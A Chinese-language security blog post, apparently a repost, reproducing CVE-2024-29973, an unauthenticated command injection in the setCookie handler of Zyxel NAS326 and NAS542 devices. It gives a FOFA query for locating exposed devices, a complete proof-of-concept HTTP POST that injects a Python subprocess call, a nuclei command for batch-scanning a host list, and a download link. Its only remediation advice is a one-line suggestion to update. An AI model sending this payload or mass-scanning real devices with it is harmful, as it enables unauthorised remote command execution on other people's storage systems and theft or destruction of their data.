漏洞复现-CVE-2024-29973

admin 2024年6月30日17:49:05评论16 views字数 1206阅读4分1秒阅读模式

Zyxel NAS设备 setCookie 未授权命令注入漏洞

:漏洞描述

Zyxel-NAS(Network Attached Storage)是由Zyxel通讯公司旗下网络附加存储设备。NAS设备长期以来我们都在共享文件和数据,提供了数据备份、远程访问、多媒体共享等功能。
Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。
漏洞影响版本

Zyxel NAS326 < V5.21(AAZF.17)C0Zyxel NAS542 < V5.21(ABAG.14)C0

:网络空间测绘查询

FOFA

body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"

漏洞复现-CVE-2024-29973

五:漏洞复现

poc
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6 ------WebKitFormBoundaryHHaZAYecVOf5sfa6Content-Disposition: form-data; name="c0" storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#------WebKitFormBoundaryHHaZAYecVOf5sfa6--

漏洞复现-CVE-2024-29973

PHP 中,传入代码执行或命令执行等危险函数的参数,客户端可控,同时针对该参数没有做过滤或过滤不足,导致代码执行或命令执行。通过远程访问方式传参,就叫做RCE。
六:批量检测
nuclei.exe -t CVE-2024-29973.yaml -l host.txt
七:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。
链接:https://pan.baidu.com/s/1L4zlTitL69WsiQWTCe-Wug 提取码:7x1y

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-29973

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月30日17:49:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-29973http://cn-sec.com/archives/2871975.html

发表评论

匿名网友 填写信息